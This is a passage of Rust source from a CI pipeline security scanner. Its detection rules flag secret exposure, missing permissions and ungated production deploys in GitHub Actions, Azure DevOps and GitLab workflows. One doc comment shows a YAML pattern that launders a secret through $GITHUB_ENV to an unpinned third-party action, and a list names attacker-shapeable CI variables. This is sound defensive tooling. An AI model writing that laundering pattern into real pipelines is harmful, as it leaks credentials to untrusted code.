5910                "Step '{}' consumes a dotenv artifact from upstream job(s) [{}]{}{} — variables defined in the upstream's `artifacts.reports.dotenv` are silently promoted to the pipeline variable namespace, indistinguishable from pipeline-level variables in subsequent jobs",
5911                consumer.name,
5912                producer_names.join(", "),
5913                env_suffix,
5914                trust_suffix
5915            ),
5916            recommendation: Recommendation::Manual {
5917                action: "Treat dotenv outputs as untrusted: pin the producer to a protected branch/tag context only, validate variable values in the consumer before use, and prefer explicit `needs:[…].artifacts: false` plus pipeline-scoped variables for deployment selection. Never let dotenv-promoted values choose service connections, deploy targets, or registry destinations without an allowlist check.".into(),
5918            },
5919            source: FindingSource::BuiltIn,
5920                extras: FindingExtras::default(),
5921});
5922    }
5923
5924    findings
5925}
5926
/// True when an environment (or job) name contains a production marker as a
/// complete segment.
///
/// The name is lower-cased and split on `-` and `/`; it matches when any
/// resulting segment is exactly one of `prod`, `production`, `prd`, `live`.
/// Examples that match: `prod`, `Production/eu-west-1`, `prod-cluster`,
/// `deploy-prod`, `eu/prod-cluster`. Substrings inside a longer word
/// (`preprod`, `reproduce`, `delivery`) do not match.
///
/// Splitting into segments (rather than probing fixed `-tok-` / `/tok/`
/// shapes) means a marker bounded by a different separator on each side —
/// e.g. `eu/prod-cluster` — is recognised too.
///
/// Returns `false` for the empty string.
fn is_production_environment(name: &str) -> bool {
    const TOKENS: &[&str] = &["prod", "production", "prd", "live"];

    // An empty name yields a single empty segment, which never matches.
    name.to_lowercase()
        .split(|c: char| c == '-' || c == '/')
        .any(|segment| TOKENS.contains(&segment))
}
5952
/// True when `script` mentions any predefined GitLab CI variable whose value
/// an outside contributor can shape: branch and tag names, commit
/// message/title/description, and the merge-request source branch, title and
/// description.
///
/// This is a plain, case-sensitive substring search — the variable name only
/// has to appear somewhere in the script text.
fn script_uses_attacker_influenced_ci_var(script: &str) -> bool {
    const TAINTED_VARS: [&str; 9] = [
        "CI_COMMIT_REF_NAME",
        "CI_COMMIT_BRANCH",
        "CI_COMMIT_TAG",
        "CI_COMMIT_MESSAGE",
        "CI_COMMIT_TITLE",
        "CI_COMMIT_DESCRIPTION",
        "CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
        "CI_MERGE_REQUEST_TITLE",
        "CI_MERGE_REQUEST_DESCRIPTION",
    ];

    for var in TAINTED_VARS.iter() {
        if script.contains(*var) {
            return true;
        }
    }
    false
}
5969
5970/// Rule: secret laundered through `$GITHUB_ENV` reaches an untrusted consumer
5971/// in the same job — composition gap between `self_mutating_pipeline` (the
5972/// gate-write detector) and `untrusted_with_authority` (the direct-access
5973/// detector).
5974///
5975/// **Pattern (R2 attack #3):**
5976/// ```yaml
5977/// jobs:
5978///   build:
5979///     steps:
5980///       - name: setup
5981///         run: echo "CLOUD_KEY=${{ secrets.CLOUD_KEY }}" >> $GITHUB_ENV   # writer
5982///       - uses: some-org/deploy@main                                        # untrusted
5983///         with:
5984///           key: ${{ env.CLOUD_KEY }}                                       # consumer
5985/// ```
5986/// The writer trips `self_mutating_pipeline`. The consumer never gets a
5987/// `HasAccessTo` edge to `CLOUD_KEY` (the value is sourced from the runner
5988/// env, not the secrets store) so neither `untrusted_with_authority` nor
5989/// `authority_propagation` fire — the env-gate launders the trust zone.
5990///
5991/// **Detection:** for every Step in the same job:
5992///   - Writer: `META_WRITES_ENV_GATE = "true"` AND has `HasAccessTo` to a
5993///     Secret/Identity (the value being laundered must derive from authority)
5994///   - Consumer: appears later in the job (NodeId order tracks declaration
5995///     order), trust zone is `Untrusted` or `ThirdParty`, and carries
5996///     `META_READS_ENV = "true"` (stamped by the parser when the step
5997///     references `${{ env.X }}` in `with:` / `run:`)
5998///
5999/// Same-job constraint enforced via `META_JOB_NAME` — the env gate only
6000/// propagates within a job, so cross-job pairs are not flagged.
6001pub fn secret_via_env_gate_to_untrusted_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
6002    let mut findings = Vec::new();
6003
6004    // Step 1: enumerate writer-with-secret nodes, paired with the laundered
6005    // authority names so the finding message can name them. We capture the
6006    // node id in declaration order so the same-job ordering check below is a
6007    // simple comparison rather than an O(n²) scan.
6008    struct Writer<'a> {
6009        id: NodeId,
6010        job: &'a str,
6011        name: &'a str,
6012        secrets: Vec<&'a str>,
6013    }
6014    let writers: Vec<Writer<'_>> = graph
6015        .nodes_of_kind(NodeKind::Step)
6016        .filter(|step| {
6017            step.metadata
6018                .get(META_WRITES_ENV_GATE)
6019                .map(|v| v == "true")
6020                .unwrap_or(false)
6021        })
6022        .filter_map(|step| {
6023            let job = step.metadata.get(META_JOB_NAME)?.as_str();
6024            // Must hold authority — collect Secret/Identity names reachable
6025            // via HasAccessTo. An env-gate write that doesn't carry any
6026            // authority is the harmless "ECHO ROUTE=/api >> $GITHUB_ENV"
6027            // case; not in scope for this rule.
6028            let secrets: Vec<&str> = graph
6029                .edges_from(step.id)
6030                .filter(|e| e.kind == EdgeKind::HasAccessTo)
6031                .filter_map(|e| graph.node(e.to))
6032                .filter(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6033                .map(|n| n.name.as_str())
6034                .collect();
6035            if secrets.is_empty() {
6036                return None;
6037            }
6038            Some(Writer {
6039                id: step.id,
6040                job,
6041                name: step.name.as_str(),
6042                secrets,
6043            })
6044        })
6045        .collect();
6046
6047    if writers.is_empty() {
6048        return findings;
6049    }
6050
6051    // Step 2: for every consumer step that reads env, find the writer(s) it
6052    // could be laundering from.
6053    for consumer in graph.nodes_of_kind(NodeKind::Step) {
6054        // Consumer must read the runner env.
6055        let reads_env = consumer
6056            .metadata
6057            .get(META_READS_ENV)
6058            .map(|v| v == "true")
6059            .unwrap_or(false);
6060        if !reads_env {
6061            continue;
6062        }
6063
6064        // Consumer must run with reduced trust — first-party readers are
6065        // already accounted for elsewhere and would be a high-FP class.
6066        if !matches!(
6067            consumer.trust_zone,
6068            TrustZone::Untrusted | TrustZone::ThirdParty
6069        ) {
6070            continue;
6071        }
6072
6073        let consumer_job = match consumer.metadata.get(META_JOB_NAME) {
6074            Some(j) => j.as_str(),
6075            None => continue,
6076        };
6077
6078        // Find writers in the same job that appear earlier (NodeId order
6079        // mirrors declaration order — see GHA parser, ADO parser).
6080        let upstream: Vec<&Writer<'_>> = writers
6081            .iter()
6082            .filter(|w| w.job == consumer_job && w.id < consumer.id)
6083            .collect();
6084
6085        if upstream.is_empty() {
6086            continue;
6087        }
6088
6089        // Aggregate the laundered authority names across all writers so
6090        // operators see the full set of credentials potentially reaching
6091        // the untrusted step. Stable ordering, dedup'd.
6092        let mut secret_labels: Vec<&str> = upstream
6093            .iter()
6094            .flat_map(|w| w.secrets.iter().copied())
6095            .collect();
6096        secret_labels.sort_unstable();
6097        secret_labels.dedup();
6098        let writer_names: Vec<&str> = upstream.iter().map(|w| w.name).collect();
6099
6100        let mut nodes_involved = vec![consumer.id];
6101        nodes_involved.extend(upstream.iter().map(|w| w.id));
6102        // Include the laundered Secret/Identity nodes themselves so the
6103        // fingerprint and downstream consumers can attribute the finding
6104        // to a specific credential.
6105        for w in &upstream {
6106            for e in graph.edges_from(w.id) {
6107                if e.kind == EdgeKind::HasAccessTo
6108                    && graph
6109                        .node(e.to)
6110                        .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6111                        .unwrap_or(false)
6112                    && !nodes_involved.contains(&e.to)
6113                {
6114                    nodes_involved.push(e.to);
6115                }
6116            }
6117        }
6118
6119        findings.push(Finding {
6120            severity: Severity::Critical,
6121            category: FindingCategory::SecretViaEnvGateToUntrustedConsumer,
6122            path: None,
6123            nodes_involved,
6124            message: format!(
6125                "Untrusted consumer '{}' in job '{}' reads from $GITHUB_ENV after step(s) [{}] laundered authority [{}] through the env gate — secret reaches untrusted code without ever appearing in a HasAccessTo edge",
6126                consumer.name,
6127                consumer_job,
6128                writer_names.join(", "),
6129                secret_labels.join(", "),
6130            ),
6131            recommendation: Recommendation::Manual {
6132                action: "Pass the secret to the consuming step via an explicit `env:` mapping on that step (so the relationship is graph-visible) instead of writing it to `$GITHUB_ENV` for ambient pickup. If the consumer is a third-party action, pin it to a 40-char SHA before exposing any secret-derived value to it.".into(),
6133            },
6134            source: FindingSource::BuiltIn,
6135            extras: FindingExtras::default(),
6136        });
6137    }
6138
6139    findings
6140}
6141
6142// ── Positive invariants (negative-space rules) ───────────────────
6143//
6144// These rules fire on the ABSENCE of an expected defensive control rather
6145// than on the presence of a misconfigured one. They are derived from the
6146// blue-team corpus defense report — patterns observed across thousands of
6147// pipelines where the well-defended workflows had a control the others were
6148// missing.
6149//
6150// Each function gates strictly on `META_PLATFORM` so a single pipeline file
6151// is only evaluated by the rules that apply to its source platform.
6152
6153/// Returns true when a graph belongs to the named platform. Falls back to
6154/// false (rule no-ops) when no platform stamp is present — keeps existing
6155/// hand-built test graphs from accidentally tripping platform-scoped rules.
6156fn graph_is_platform(graph: &AuthorityGraph, platform: &str) -> bool {
6157    graph
6158        .metadata
6159        .get(META_PLATFORM)
6160        .map(|p| p == platform)
6161        .unwrap_or(false)
6162}
6163
6164/// Rule: GHA workflow declares no top-level `permissions:` block AND no
6165/// per-job permissions block. With nothing declared, `GITHUB_TOKEN` falls
6166/// back to the broad platform default (`contents: write`, `packages: write`,
6167/// metadata read, etc.) on every trigger. Explicit declarations make the
6168/// blast radius legible to the next reviewer; absence makes it invisible.
6169///
6170/// Detection:
6171///   * `META_PLATFORM == "github-actions"` (gates ADO/GitLab out)
6172///   * Graph carries `META_NO_WORKFLOW_PERMISSIONS == "true"` (parser-set
6173///     when `workflow.permissions` is absent)
6174///   * No Identity node whose name starts with `GITHUB_TOKEN (` (those are
6175///     the per-job override identities the parser creates when a job
6176///     declares its own permissions block)
6177///
6178/// Severity: Medium. Not a direct exploit path on its own but compounds
6179/// every other finding in the same workflow.
6180pub fn no_workflow_level_permissions_block(graph: &AuthorityGraph) -> Vec<Finding> {
6181    if !graph_is_platform(graph, "github-actions") {
6182        return Vec::new();
6183    }
6184    let no_workflow_perms = graph
6185        .metadata
6186        .get(META_NO_WORKFLOW_PERMISSIONS)
6187        .map(|v| v == "true")
6188        .unwrap_or(false);
6189    if !no_workflow_perms {
6190        return Vec::new();
6191    }
6192    // Empty graphs (variable-only YAML files mis-detected as GHA, parse
6193    // failures that left the graph empty, etc.) carry no real authority
6194    // surface to be over-broad over. Skip them. A real workflow always
6195    // produces at least one Step node.
6196    if graph.nodes_of_kind(NodeKind::Step).next().is_none() {
6197        return Vec::new();
6198    }
6199    // Per-job permissions blocks create Identity nodes named
6200    // `GITHUB_TOKEN (<job_name>)`. If any exists, the workflow has at least
6201    // one job-scoped permissions block — don't fire.
6202    let has_job_level_perms = graph.nodes_of_kind(NodeKind::Identity).any(|n| {
6203        n.name.starts_with("GITHUB_TOKEN (")
6204            || (n.name == "GITHUB_TOKEN" && n.metadata.contains_key(META_PERMISSIONS))
6205    });
6206    if has_job_level_perms {
6207        return Vec::new();
6208    }
6209    vec![Finding {
6210        severity: Severity::Medium,
6211        category: FindingCategory::NoWorkflowLevelPermissionsBlock,
6212        path: None,
6213        nodes_involved: Vec::new(),
6214        message: "Workflow declares no top-level or per-job `permissions:` block — GITHUB_TOKEN \
6215             falls back to the broad platform default (contents: write, packages: write, …) \
6216             on every trigger. Explicit permissions make the blast radius legible to triage."
6217            .into(),
6218        recommendation: Recommendation::ReducePermissions {
6219            current: "platform default (broad)".into(),
6220            minimum: "permissions: {} at top level, then add the minimum per-job — e.g. \
6221                      `permissions: { contents: read }`"
6222                .into(),
6223        },
6224        source: FindingSource::BuiltIn,
6225        extras: FindingExtras::default(),
6226    }]
6227}
6228
6229/// Rule: ADO job referencing a production-named service connection has no
6230/// `environment:` binding. Strictly broader than
6231/// `terraform_auto_approve_in_prod` — fires on any prod-SC step (Terraform,
6232/// ARM, AzureCLI, AzurePowerShell, custom) whose enclosing job lacks the
6233/// approval gate, regardless of whether `-auto-approve` is set.
6234///
6235/// Detection (per Step):
6236///   * `META_PLATFORM == "azure-devops"`
6237///   * Step carries `META_SERVICE_CONNECTION_NAME` matching prod pattern,
6238///     OR an `Identity` connected via `HasAccessTo` whose name matches
6239///     the same pattern AND carries `META_SERVICE_CONNECTION == "true"`.
6240///   * Step does NOT carry `META_ENV_APPROVAL` (parser tags every step
6241///     inside an environment-bound deployment job).
6242///
6243/// One finding per matching step (matching `terraform_auto_approve_in_prod`
6244/// granularity). Severity: High.
6245pub fn prod_deploy_job_no_environment_gate(graph: &AuthorityGraph) -> Vec<Finding> {
6246    if !graph_is_platform(graph, "azure-devops") {
6247        return Vec::new();
6248    }
6249    let mut findings = Vec::new();
6250    for step in graph.nodes_of_kind(NodeKind::Step) {
6251        let env_gated = step
6252            .metadata
6253            .get(META_ENV_APPROVAL)
6254            .map(|v| v == "true")
6255            .unwrap_or(false);
6256        if env_gated {
6257            continue;
6258        }
6259        let direct = step.metadata.get(META_SERVICE_CONNECTION_NAME).cloned();
6260        let edge_conn = graph
6261            .edges_from(step.id)
6262            .filter(|e| e.kind == EdgeKind::HasAccessTo)
6263            .filter_map(|e| graph.node(e.to))
6264            .find(|n| {
6265                n.kind == NodeKind::Identity
6266                    && n.metadata
6267                        .get(META_SERVICE_CONNECTION)
6268                        .map(|v| v == "true")
6269                        .unwrap_or(false)
6270            })
6271            .map(|n| n.name.clone());
6272        let conn_name = match direct.or(edge_conn) {
6273            Some(n) if looks_like_prod_connection(&n) => n,
6274            _ => continue,
6275        };
6276        findings.push(Finding {
6277            severity: Severity::High,
6278            category: FindingCategory::ProdDeployJobNoEnvironmentGate,
6279            path: None,
6280            nodes_involved: vec![step.id],
6281            message: format!(
6282                "Step '{}' targets production service connection '{}' but its job has no \
6283                 `environment:` binding — every pipeline trigger applies changes with no \
6284                 approval queue and no entry in the ADO Environments audit trail",
6285                step.name, conn_name
6286            ),
6287            recommendation: Recommendation::Manual {
6288                action: "Move the step into a deployment job whose `environment:` is configured \
6289                         with required approvers in ADO. Even if `-auto-approve` is acceptable \
6290                         (e.g. `terraform apply tfplan`), the environment binding gives the \
6291                         platform a chokepoint for approvals, audit, and concurrency limits."
6292                    .into(),
6293            },
6294            source: FindingSource::BuiltIn,
6295            extras: FindingExtras::default(),
6296        });
6297    }
6298    findings
6299}
6300
6301/// Rule: long-lived static credential in scope but the graph has no OIDC
6302/// identity. Advisory uplift on top of `long_lived_credential` that wires
6303/// the existing `Recommendation::FederateIdentity` variant — emits one Info
6304/// finding per static credential whose name suggests a cloud provider that
6305/// supports OIDC (AWS / GCP / Azure).
6306///
6307/// Heuristic: AWS / GCP / Azure tokens usually carry the provider name in
6308/// the variable identifier (`AWS_*`, `GCP_*`, `GCLOUD_*`, `GOOGLE_*`,
6309/// `AZURE_*`, `ARM_*`). When such a name appears AND no OIDC identity
6310/// exists in the graph, the migration to federation is the actionable
6311/// remediation. The recommendation enum has carried `FederateIdentity` for
6312/// two releases without any rule emitting it.
6313///
6314/// Severity: Info (advisory). The underlying credential is already flagged
6315/// at higher severity by `long_lived_credential`.
6316pub fn long_lived_secret_without_oidc_recommendation(graph: &AuthorityGraph) -> Vec<Finding> {
6317    // Skip if any OIDC identity already exists — the workflow is already on
6318    // a federated path; the static credential it carries is presumably a
6319    // legacy artifact unrelated to the OIDC integration.
6320    let has_oidc = graph.nodes_of_kind(NodeKind::Identity).any(|n| {
6321        n.metadata
6322            .get(META_OIDC)
6323            .map(|v| v == "true")
6324            .unwrap_or(false)
6325    });
6326    if has_oidc {
6327        return Vec::new();
6328    }
6329    let mut findings = Vec::new();
6330    for secret in graph.nodes_of_kind(NodeKind::Secret) {
6331        let upper = secret.name.to_uppercase();
6332        let provider: Option<(&str, &str)> = if upper.starts_with("AWS_")
6333            || upper.contains("AWS_ACCESS_KEY")
6334            || upper.contains("AWS_SECRET")
6335        {
6336            Some(("AWS", "GitHub Actions OIDC + sts:AssumeRoleWithWebIdentity (id-token: write + aws-actions/configure-aws-credentials)"))
6337        } else if upper.starts_with("GCP_")
6338            || upper.starts_with("GCLOUD_")
6339            || upper.starts_with("GOOGLE_")
6340            || upper.contains("GCP_SERVICE_ACCOUNT")
6341            || upper.contains("GOOGLE_CREDENTIALS")
6342        {
6343            Some(("GCP", "GCP Workload Identity Federation (google-github-actions/auth with workload_identity_provider)"))
6344        } else if upper.starts_with("AZURE_")
6345            || upper.starts_with("ARM_")
6346            || upper.contains("AZURE_CLIENT_SECRET")
6347        {
6348            Some((
6349                "Azure",
6350                "Azure federated credential (azure/login with client-id, no client-secret)",
6351            ))
6352        } else {
6353            None
6354        };
6355        let Some((cloud, oidc_provider)) = provider else {
6356            continue;
6357        };
6358        findings.push(Finding {
6359            severity: Severity::Info,
6360            category: FindingCategory::LongLivedSecretWithoutOidcRecommendation,
6361            path: None,
6362            nodes_involved: vec![secret.id],
6363            message: format!(
6364                "Long-lived {cloud} credential '{}' is in scope and no OIDC identity exists \
6365                 in this workflow — {cloud} supports OIDC federation, so this credential could \
6366                 be replaced with a short-lived token issued at runtime",
6367                secret.name
6368            ),
6369            recommendation: Recommendation::FederateIdentity {
6370                static_secret: secret.name.clone(),
6371                oidc_provider: oidc_provider.into(),
6372            },
6373            source: FindingSource::BuiltIn,
6374            extras: FindingExtras::default(),
6375        });
6376    }
6377    findings
6378}
6379
6380/// Rule: GHA workflow with multiple privileged jobs where SOME steps carry
6381/// the standard fork-check `if:` and OTHERS do not — intra-file
6382/// inconsistency in defensive posture. The org has the right instinct
6383/// (some jobs are guarded) but applied it unevenly. Surfaces the unguarded
6384/// privileged jobs by name so a reviewer can fix the gap in one PR.
6385///
6386/// Detection:
6387///   * `META_PLATFORM == "github-actions"`
6388///   * Trigger contains `pull_request` or `pull_request_target`
6389///   * Multiple jobs hold authority (steps with `HasAccessTo` to a Secret
6390///     or Identity)
6391///   * At least one such job's privileged steps ALL carry
6392///     `META_FORK_CHECK == "true"`
6393///   * AND at least one OTHER privileged job has NO step carrying that
6394///     marker
6395///
6396/// Severity: High. Severity floors at Medium when the inconsistency is
6397/// limited to a single unguarded job (one-off oversight) vs. multiple
6398/// (systemic gap).
6399pub fn pull_request_workflow_inconsistent_fork_check(graph: &AuthorityGraph) -> Vec<Finding> {
6400    if !graph_is_platform(graph, "github-actions") {
6401        return Vec::new();
6402    }
6403    let trigger = match graph.metadata.get(META_TRIGGER) {
6404        Some(t) => t.as_str(),
6405        None => return Vec::new(),
6406    };
6407    let in_pr_context = trigger.split(',').any(|t| {
6408        let t = t.trim();
6409        matches!(t, "pull_request" | "pull_request_target")
6410    });
6411    if !in_pr_context {
6412        return Vec::new();
6413    }
6414
6415    // For each privileged step, record (job_name, has_fork_check). A job is
6416    // "guarded" iff every privileged step in it carries the marker.
6417    use std::collections::BTreeMap;
6418    let mut per_job: BTreeMap<String, (bool, bool)> = BTreeMap::new(); // job -> (any_guarded, any_unguarded)
6419
6420    for step in graph.nodes_of_kind(NodeKind::Step) {
6421        let holds_authority = graph.edges_from(step.id).any(|e| {
6422            e.kind == EdgeKind::HasAccessTo
6423                && graph
6424                    .node(e.to)
6425                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6426                    .unwrap_or(false)
6427        });
6428        if !holds_authority {
6429            continue;
6430        }
6431        let job = step
6432            .metadata
6433            .get(META_JOB_NAME)
6434            .cloned()
6435            .unwrap_or_else(|| step.name.clone());
6436        let guarded = step
6437            .metadata
6438            .get(META_FORK_CHECK)
6439            .map(|v| v == "true")
6440            .unwrap_or(false);
6441        let entry = per_job.entry(job).or_insert((false, false));
6442        if guarded {
6443            entry.0 = true;
6444        } else {
6445            entry.1 = true;
6446        }
6447    }
6448
6449    // Need >= 2 distinct privileged jobs; >= 1 fully-guarded job and >= 1
6450    // job with at least one unguarded privileged step.
6451    if per_job.len() < 2 {
6452        return Vec::new();
6453    }
6454    let fully_guarded: Vec<&String> = per_job
6455        .iter()
6456        .filter(|(_, (g, u))| *g && !*u)
6457        .map(|(k, _)| k)
6458        .collect();
6459    let unguarded: Vec<&String> = per_job
6460        .iter()
6461        .filter(|(_, (_, u))| *u)
6462        .map(|(k, _)| k)
6463        .collect();
6464    if fully_guarded.is_empty() || unguarded.is_empty() {
6465        return Vec::new();
6466    }
6467    let severity = if unguarded.len() >= 2 {
6468        Severity::High
6469    } else {
6470        Severity::Medium
6471    };
6472    let guarded_label = fully_guarded
6473        .iter()
6474        .map(|s| s.as_str())
6475        .collect::<Vec<_>>()
6476        .join(", ");
6477    let unguarded_label = unguarded
6478        .iter()
6479        .map(|s| s.as_str())
6480        .collect::<Vec<_>>()
6481        .join(", ");
6482    vec![Finding {
6483        severity,
6484        category: FindingCategory::PullRequestWorkflowInconsistentForkCheck,
6485        path: None,
6486        nodes_involved: Vec::new(),
6487        message: format!(
6488            "PR-triggered workflow ('{trigger}') applies the standard fork-check \
6489             (`github.event.pull_request.head.repo.fork == false` or equivalent) on \
6490             privileged jobs [{guarded_label}] but NOT on [{unguarded_label}] — the \
6491             unguarded jobs hold authority that fork PRs can reach"
6492        ),
6493        recommendation: Recommendation::Manual {
6494            action: format!(
6495                "Add `if: github.event.pull_request.head.repo.fork == false` (or \
6496                 `github.event.pull_request.head.repo.full_name == github.repository`) to the \
6497                 privileged steps in [{unguarded_label}]. Match the pattern already used by \
6498                 [{guarded_label}] in the same workflow."
6499            ),
6500        },
6501        source: FindingSource::BuiltIn,
6502        extras: FindingExtras::default(),
6503    }]
6504}
6505
6506/// Rule: GitLab job with a production-named `environment:` binding has no
6507/// `rules:` / `only:` clause restricting it to protected branches. The job
6508/// runs (or attempts to run) on every pipeline trigger; if branch
6509/// protection is later relaxed the deploy becomes runnable from
6510/// unprotected branches without any code change.
6511///
6512/// Detection (per Step in a GitLab graph):
6513///   * `META_PLATFORM == "gitlab"`
6514///   * Step carries `environment_name` matching a production token
6515///     (`prod`, `production`, `prd`)
6516///   * Step does NOT carry `META_RULES_PROTECTED_ONLY`
6517///
6518/// Severity: Medium.
6519pub fn gitlab_deploy_job_missing_protected_branch_only(graph: &AuthorityGraph) -> Vec<Finding> {
6520    if !graph_is_platform(graph, "gitlab") {
6521        return Vec::new();
6522    }
6523    let mut findings = Vec::new();
6524    for step in graph.nodes_of_kind(NodeKind::Step) {
6525        let env_name = match step.metadata.get("environment_name") {
6526            Some(n) => n.clone(),
6527            None => continue,
6528        };
6529        if !looks_like_prod_connection(&env_name) {
6530            continue;
6531        }
6532        let protected = step
6533            .metadata
6534            .get(META_RULES_PROTECTED_ONLY)
6535            .map(|v| v == "true")
6536            .unwrap_or(false);
6537        if protected {
6538            continue;
6539        }
6540        findings.push(Finding {
6541            severity: Severity::Medium,
6542            category: FindingCategory::GitlabDeployJobMissingProtectedBranchOnly,
6543            path: None,
6544            nodes_involved: vec![step.id],
6545            message: format!(
6546                "GitLab deploy job '{}' targets production environment '{}' but has no \
6547                 `rules:` / `only:` clause restricting it to protected branches — every MR \
6548                 and every push will attempt to run the deploy",
6549                step.name, env_name
6550            ),
6551            recommendation: Recommendation::Manual {
6552                action: "Add `rules: - if: '$CI_COMMIT_REF_PROTECTED == \"true\"'` to the job, \
6553                         or `only: [main]` for the simplest case. This survives future \
6554                         changes to branch-protection settings."
6555                    .into(),
6556            },
6557            source: FindingSource::BuiltIn,
6558            extras: FindingExtras::default(),
6559        });
6560    }
6561    findings
6562}
6563
6564// ── Compensating-control suppressions ────────────────────────
6565//
6566// These suppressions DOWNGRADE or REMOVE existing-rule findings when the
6567// graph carries a control that neutralises (or substantially mitigates)
6568// the underlying risk. Applied as a post-processing pass so each
6569// suppression can see both the finding and the surrounding graph state.
6570//
6571// Design intent (from the blue-team corpus defense report):
6572//   * downgrade > suppress: keep the finding visible at a lower severity
6573//     so it still surfaces in audits, but stop competing for triage time
6574//     with un-mitigated criticals
6575//   * never *delete* a finding silently — every suppression appends an
6576//     explanation suffix to the message describing the compensating
6577//     control taudit credited
6578//
6579// Suppressions implemented here:
6580//   1. `checkout_self_pr_exposure` downgraded when the same job has no
6581//      privileged steps (no Secret/Identity access and no env-gate writes).
6582//   2. `trigger_context_mismatch` downgraded when every privileged step
6583//      in the workflow carries the standard fork-check `if:`.
6584//   3. `over_privileged_identity` suppressed when the workflow-level
6585//      identity is broad but at least one job-level override narrows the
6586//      scope (job-level wins at runtime).
6587//   4. `terraform_auto_approve_in_prod` downgraded — not skipped — when an
6588//      `environment:` gate is present (replaces the previous early-skip
6589//      which discarded the finding entirely).
6590fn apply_compensating_controls(graph: &AuthorityGraph, findings: &mut [Finding]) {
6591    // Pre-compute graph-level signals once so the per-finding loop stays
6592    // O(N findings) rather than O(N findings × M nodes).
6593    let mut all_authority_steps_have_fork_check = true;
6594    let mut any_authority_step_seen = false;
6595    for step in graph.nodes_of_kind(NodeKind::Step) {
6596        let holds_authority = graph.edges_from(step.id).any(|e| {
6597            e.kind == EdgeKind::HasAccessTo
6598                && graph
6599                    .node(e.to)
6600                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6601                    .unwrap_or(false)
6602        });
6603        if !holds_authority {
6604            continue;
6605        }
6606        any_authority_step_seen = true;
6607        let guarded = step
6608            .metadata
6609            .get(META_FORK_CHECK)
6610            .map(|v| v == "true")
6611            .unwrap_or(false);
6612        if !guarded {
6613            all_authority_steps_have_fork_check = false;
6614        }
6615    }
6616    let fork_check_universal = any_authority_step_seen && all_authority_steps_have_fork_check;
6617
6618    // For Suppression 1, build per-job: does any step in the job have
6619    // access to a Secret/Identity OR write to the env gate?
6620    use std::collections::{BTreeMap, BTreeSet};
6621    let mut job_has_privileged_step: BTreeMap<String, bool> = BTreeMap::new();
6622    for step in graph.nodes_of_kind(NodeKind::Step) {
6623        let job = match step.metadata.get(META_JOB_NAME) {
6624            Some(j) => j.clone(),
6625            None => continue,
6626        };
6627        let privileged = graph.edges_from(step.id).any(|e| {
6628            e.kind == EdgeKind::HasAccessTo
6629                && graph
6630                    .node(e.to)
6631                    .map(|n| matches!(n.kind, NodeKind::Secret | NodeKind::Identity))
6632                    .unwrap_or(false)
6633        }) || step
6634            .metadata
6635            .get(META_WRITES_ENV_GATE)
6636            .map(|v| v == "true")
6637            .unwrap_or(false);
6638        let entry = job_has_privileged_step.entry(job).or_insert(false);
6639        if privileged {
6640            *entry = true;
6641        }
6642    }
6643
6644    // For Suppression 3 — over_privileged_identity — collect the names of
6645    // narrower per-job identity overrides so we can credit them when the
6646    // broad workflow-level identity fires.
6647    let job_level_narrow_overrides: BTreeSet<String> = graph
6648        .nodes_of_kind(NodeKind::Identity)
6649        .filter(|n| {
6650            n.name.starts_with("GITHUB_TOKEN (")
6651                && n.metadata
6652                    .get(META_IDENTITY_SCOPE)
6653                    .map(|s| s == "constrained")
6654                    .unwrap_or(false)
6655        })
6656        .map(|n| n.name.clone())
6657        .collect();
6658
6659    for finding in findings.iter_mut() {
6660        match finding.category {
6661            // ── Suppression 1: checkout_self_pr_exposure
6662            FindingCategory::CheckoutSelfPrExposure => {
6663                // Identify the checkout step (first node in nodes_involved)
6664                // and look up its job. If the job has no privileged steps,
6665                // the checkout is read-only — downgrade to Info.
6666                let job = finding
6667                    .nodes_involved
6668                    .first()
6669                    .and_then(|id| graph.node(*id))
6670                    .and_then(|n| n.metadata.get(META_JOB_NAME).cloned());
6671                let job_privileged = job
6672                    .as_ref()
6673                    .and_then(|j| job_has_privileged_step.get(j).copied())
6674                    .unwrap_or(true); // unknown → conservative: keep High
6675                if !job_privileged {
6676                    finding.severity = Severity::Info;
6677                    finding.message.push_str(
6678                        " (downgraded: no privileged steps in same job — \
6679                                   checkout is read-only for lint/test/analysis)",
6680                    );
6681                }
6682            }
6683            // ── Suppression 2: trigger_context_mismatch
6684            FindingCategory::TriggerContextMismatch => {
6685                if fork_check_universal {
6686                    // Critical → Medium (not Info — the trigger choice itself
6687                    // is still risky enough to keep visible for audit).
6688                    finding.severity = match finding.severity {
6689                        Severity::Critical => Severity::Medium,
6690                        s => downgrade_one_step(s),
6691                    };
6692                    finding.message.push_str(
6693                        " (downgraded: every privileged job in this workflow carries the \
6694                         standard fork-check `if:` — fork PRs cannot reach the privileged steps)",
6695                    );
6696                }
6697            }
6698            // ── Suppression 3: over_privileged_identity
6699            FindingCategory::OverPrivilegedIdentity => {
6700                // Only relevant when the firing identity IS the
6701                // workflow-level GITHUB_TOKEN AND at least one job has its
6702                // own narrower override.
6703                let firing_node_name = finding
6704                    .nodes_involved
6705                    .first()
6706                    .and_then(|id| graph.node(*id))
6707                    .map(|n| n.name.clone());
6708                let is_workflow_level_token = firing_node_name.as_deref() == Some("GITHUB_TOKEN");
6709                if is_workflow_level_token && !job_level_narrow_overrides.is_empty() {
6710                    // Suppress by reducing to Info — the runtime identity
6711                    // any job actually uses is the narrower job-level one.
6712                    finding.severity = Severity::Info;
6713                    let mut narrower: Vec<&str> = job_level_narrow_overrides
6714                        .iter()
6715                        .map(|s| s.as_str())
6716                        .collect();
6717                    narrower.sort_unstable();
6718                    finding.message.push_str(&format!(
6719                        " (suppressed: job-level permissions narrow this scope at runtime — \
6720                         see {})",
6721                        narrower.join(", ")
6722                    ));
6723                }
6724            }
6725            // ── Suppression 4: terraform_auto_approve_in_prod
6726            //
6727            // The pre-existing rule already early-skipped
6728            // env-gated steps, so it never emits a finding to downgrade.
6729            // Downgrade is wired into the rule body itself (search for
6730            // `env_gated`) — kept as a no-op match arm here so future
6731            // contributors can find the suppression-pass alongside the
6732            // others.
6733            FindingCategory::TerraformAutoApproveInProd => { /* see rule body */ }
6734            _ => {}
6735        }
6736    }
6737}
6738
6739#[cfg(test)]
6740mod tests {
6741    use super::*;
6742    use crate::graph::*;
6743
6744    fn source(file: &str) -> PipelineSource {
6745        PipelineSource {
6746            file: file.into(),
6747            repo: None,
